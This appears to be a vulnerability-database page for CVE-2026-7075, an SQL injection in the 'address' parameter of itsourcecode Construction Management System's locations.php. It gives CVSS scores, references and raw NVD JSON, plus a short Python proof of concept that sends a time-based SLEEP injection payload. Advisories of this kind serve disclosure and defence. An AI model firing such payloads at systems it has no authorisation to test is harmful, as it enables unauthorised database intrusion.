CVE-2026-7075

Description

A vulnerability was found in itsourcecode Construction Management System 1.0. This issue affects some unknown processing of the file /locations.php. Performing a manipulation of the argument address results in sql injection. It is possible to initiate the attack remotely. The exploit has been made public and could be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

itsourcecode Construction Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
import requests

def check_sqli(target_url):
    """
    PoC for CVE-2026-7075 SQL Injection in locations.php
    Testing the 'address' parameter.
    """
    # Payload to cause a time-based delay or syntax error
    injection_payload = "' OR SLEEP(5)-- -"
    
    params = {
        "address": injection_payload
    }
    
    try:
        print(f"[+] Sending request to {target_url}/locations.php")
        response = requests.get(target_url + "/locations.php", params=params, timeout=10)
        
        # If response takes longer than usual, SQLi might be successful
        if response.elapsed.total_seconds() >= 5:
            print("[!] Potential SQL Injection vulnerability confirmed (Time-based).")
        else:
            print("[-] Vulnerability not confirmed or WAF blocked.")
            
    except requests.RequestException as e:
        print(f"[Error] {e}")

if __name__ == "__main__":
    target = "http://localhost"  # Replace with actual target
    check_sqli(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-7075
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-7075
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-7075/
[4] VulDB https://vuldb.com/cve/CVE-2026-7075
[5] https://github.com/Beatriz-ai-boop/cve/issues/4
[6] https://itsourcecode.com/
[7] https://vuldb.com/submit/799545
[8] https://vuldb.com/vuln/359650
[9] https://vuldb.com/vuln/359650/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-7075", "sourceIdentifier": "[email protected]", "published": "2026-04-27T02:16:01.480", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in itsourcecode Construction Management System 1.0. This issue affects some unknown processing of the file /locations.php. Performing a manipulation of the argument address results in sql injection. It is possible to initiate the attack remotely. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/Beatriz-ai-boop/cve/issues/4", "source": "[email protected]"}, {"url": "https://itsourcecode.com/", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/799545", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/359650", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/359650/cti", "source": "[email protected]"}]}}